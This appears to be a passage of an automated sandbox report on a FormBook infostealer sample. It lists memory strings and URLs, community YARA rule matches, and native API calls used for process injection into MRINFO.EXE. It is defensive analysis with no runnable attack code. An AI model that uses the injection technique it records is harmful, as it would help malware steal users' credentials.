Source: MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&utm_medium=link&utm_campaign=solutions
Source: MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.arsys.es?utm_source=parking&utm_medium=link&utm_campaign=arsys
Source: MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_s
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_hos
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_c
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.sendly.digital&utm_medium=parking&utm_c
Source: MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sendly.digital&reg_source=parking_auto
Source: MRINFO.EXE, 00000003.00000002.4158117202.00000000043CC000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000399C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.xp.cn

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.alWUxZvrvU.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.alWUxZvrvU.exe.c70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C9C5E3 NtClose,	0_2_00C9C5E3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2B60 NtClose,LdrInitializeThunk,	0_2_00EE2B60
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2C70 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_00EE2C70
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2DF0 NtQuerySystemInformation,LdrInitializeThunk,	0_2_00EE2DF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE35C0 NtCreateMutant,LdrInitializeThunk,	0_2_00EE35C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE4340 NtSetContextThread,	0_2_00EE4340
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE4650 NtSuspendThread,	0_2_00EE4650
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2AF0 NtWriteFile,	0_2_00EE2AF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2AD0 NtReadFile,	0_2_00EE2AD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2AB0 NtWaitForSingleObject,	0_2_00EE2AB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2BE0 NtQueryValueKey,	0_2_00EE2BE0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2BF0 NtAllocateVirtualMemory,	0_2_00EE2BF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2BA0 NtEnumerateValueKey,	0_2_00EE2BA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2B80 NtQueryInformationFile,	0_2_00EE2B80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2CF0 NtOpenProcess,	0_2_00EE2CF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2CC0 NtQueryVirtualMemory,	0_2_00EE2CC0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2CA0 NtQueryInformationToken,	0_2_00EE2CA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2C60 NtCreateKey,	0_2_00EE2C60
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2C00 NtQueryInformationProcess,	0_2_00EE2C00
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2DD0 NtDelayExecution,	0_2_00EE2DD0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2DB0 NtEnumerateKey,	0_2_00EE2DB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2D30 NtUnmapViewOfSection,	0_2_00EE2D30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2D00 NtSetInformationFile,	0_2_00EE2D00
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2D10 NtMapViewOfSection,	0_2_00EE2D10
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2EE0 NtQueueApcThread,	0_2_00EE2EE0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2EA0 NtAdjustPrivilegesToken,	0_2_00EE2EA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2E80 NtReadVirtualMemory,	0_2_00EE2E80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2E30 NtWriteVirtualMemory,	0_2_00EE2E30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2FE0 NtCreateFile,	0_2_00EE2FE0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2FA0 NtQuerySection,	0_2_00EE2FA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2FB0 NtResumeThread,	0_2_00EE2FB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2F90 NtProtectVirtualMemory,	0_2_00EE2F90
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2F60 NtCreateProcessEx,	0_2_00EE2F60
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2F30 NtCreateSection,	0_2_00EE2F30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE3090 NtSetValueKey,	0_2_00EE3090
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE3010 NtOpenDirectoryObject,	0_2_00EE3010
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE39B0 NtGetContextThread,	0_2_00EE39B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE3D70 NtOpenThread,	0_2_00EE3D70
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE3D10 NtOpenProcessToken,	0_2_00EE3D10
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E4340 NtSetContextThread,LdrInitializeThunk,	3_2_033E4340
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E4650 NtSuspendThread,LdrInitializeThunk,	3_2_033E4650
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2B60 NtClose,LdrInitializeThunk,	3_2_033E2B60
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_033E2BA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_033E2BF0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_033E2BE0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2AF0 NtWriteFile,LdrInitializeThunk,	3_2_033E2AF0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2AD0 NtReadFile,LdrInitializeThunk,	3_2_033E2AD0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2F30 NtCreateSection,LdrInitializeThunk,	3_2_033E2F30
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2FB0 NtResumeThread,LdrInitializeThunk,	3_2_033E2FB0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2FE0 NtCreateFile,LdrInitializeThunk,	3_2_033E2FE0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_033E2E80
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_033E2EE0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_033E2D30
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_033E2D10
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_033E2DF0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2DD0 NtDelayExecution,LdrInitializeThunk,	3_2_033E2DD0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_033E2C70
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2C60 NtCreateKey,LdrInitializeThunk,	3_2_033E2C60
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_033E2CA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E35C0 NtCreateMutant,LdrInitializeThunk,	3_2_033E35C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E39B0 NtGetContextThread,LdrInitializeThunk,	3_2_033E39B0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2B80 NtQueryInformationFile,	3_2_033E2B80
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2AB0 NtWaitForSingleObject,	3_2_033E2AB0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2F60 NtCreateProcessEx,	3_2_033E2F60
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2FA0 NtQuerySection,	3_2_033E2FA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2F90 NtProtectVirtualMemory,	3_2_033E2F90
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2E30 NtWriteVirtualMemory,	3_2_033E2E30
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2EA0 NtAdjustPrivilegesToken,	3_2_033E2EA0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2D00 NtSetInformationFile,	3_2_033E2D00
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2DB0 NtEnumerateKey,	3_2_033E2DB0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2C00 NtQueryInformationProcess,	3_2_033E2C00
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2CF0 NtOpenProcess,	3_2_033E2CF0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E2CC0 NtQueryVirtualMemory,	3_2_033E2CC0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E3010 NtOpenDirectoryObject,	3_2_033E3010
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E3090 NtSetValueKey,	3_2_033E3090
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E3D10 NtOpenProcessToken,	3_2_033E3D10
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_033E3D70 NtOpenThread,	3_2_033E3D70
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029A8F50 NtCreateFile,	3_2_029A8F50
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029A9260 NtClose,	3_2_029A9260
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029A93D0 NtAllocateVirtualMemory,	3_2_029A93D0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029A90C0 NtReadFile,	3_2_029A90C0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_029A91B0 NtDeleteFile,	3_2_029A91B0
Source: C:\Windows\SysWOW64\MRINFO.EXE	Code function: 3_2_031CF317 NtReadVirtualMemory,	3_2_031CF317

Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C88523	0_2_00C88523
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C730E0	0_2_00C730E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7E013	0_2_00C7E013
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C723B0	0_2_00C723B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C9EC63	0_2_00C9EC63
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C72C30	0_2_00C72C30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7FD73	0_2_00C7FD73
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7FD70	0_2_00C7FD70
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C726E0	0_2_00C726E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C7FF93	0_2_00C7FF93
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C8670F	0_2_00C8670F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00C86713	0_2_00C86713
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F42000	0_2_00F42000
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F681CC	0_2_00F681CC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F641A2	0_2_00F641A2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F701AA	0_2_00F701AA
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F38158	0_2_00F38158
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0100	0_2_00EA0100
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4A118	0_2_00F4A118
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F302C0	0_2_00F302C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50274	0_2_00F50274
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F703E6	0_2_00F703E6
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE3F0	0_2_00EBE3F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6A352	0_2_00F6A352
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5E4F6	0_2_00F5E4F6
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F62446	0_2_00F62446
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F54420	0_2_00F54420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F70591	0_2_00F70591
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECC6E0	0_2_00ECC6E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAC7C0	0_2_00EAC7C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED4750	0_2_00ED4750
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE8F0	0_2_00EDE8F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E968B8	0_2_00E968B8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBA840	0_2_00EBA840
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB2840	0_2_00EB2840
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB29A0	0_2_00EB29A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F7A9A6	0_2_00F7A9A6
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC6962	0_2_00EC6962
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAEA80	0_2_00EAEA80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F66BD7	0_2_00F66BD7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6AB40	0_2_00F6AB40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0CF2	0_2_00EA0CF2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F50CB5	0_2_00F50CB5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0C00	0_2_00EB0C00
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAADE0	0_2_00EAADE0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC8DBF	0_2_00EC8DBF
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBAD00	0_2_00EBAD00
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4CD1F	0_2_00F4CD1F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6EEDB	0_2_00F6EEDB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6CE93	0_2_00F6CE93
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2E90	0_2_00EC2E90
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0E59	0_2_00EB0E59
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6EE26	0_2_00F6EE26
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA2FC8	0_2_00EA2FC8
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2EFA0	0_2_00F2EFA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F24F40	0_2_00F24F40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F52F30	0_2_00F52F30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF2F28	0_2_00EF2F28
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED0F30	0_2_00ED0F30
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6F0E0	0_2_00F6F0E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F670E9	0_2_00F670E9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB70C0	0_2_00EB70C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5F0CC	0_2_00F5F0CC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBB1B0	0_2_00EBB1B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE516C	0_2_00EE516C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9F172	0_2_00E9F172
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F7B16B	0_2_00F7B16B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F512ED	0_2_00F512ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECD2F0	0_2_00ECD2F0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECB2C0	0_2_00ECB2C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB52A0	0_2_00EB52A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF739A	0_2_00EF739A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9D34C	0_2_00E9D34C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6132D	0_2_00F6132D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA1460	0_2_00EA1460
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6F43F	0_2_00F6F43F
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4D5B0	0_2_00F4D5B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F67571	0_2_00F67571
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F616CC	0_2_00F616CC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6F7B0	0_2_00F6F7B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB38E0	0_2_00EB38E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1D800	0_2_00F1D800
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB9950	0_2_00EB9950
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECB950	0_2_00ECB950
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F45910	0_2_00F45910
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5DAC6	0_2_00F5DAC6
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EF5AA0	0_2_00EF5AA0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F51AA3	0_2_00F51AA3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4DAAC	0_2_00F4DAAC
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F23A6C	0_2_00F23A6C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F67A46	0_2_00F67A46
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6FA49	0_2_00F6FA49
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F25BF0	0_2_00F25BF0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EEDBF9	0_2_00EEDBF9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECFB80	0_2_00ECFB80
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6FB76	0_2_00F6FB76
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6FCF2	0_2_00F6FCF2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F29C32	0_2_00F29C32
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECFDC0	0_2_00ECFDC0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F67D73	0_2_00F67D73
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB3D40	0_2_00EB3D40
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F61D5A	0_2_00F61D5A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB9EB0	0_2_00EB9EB0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6FFB1	0_2_00F6FFB1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB1F92	0_2_00EB1F92
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6FF09	0_2_00F6FF09
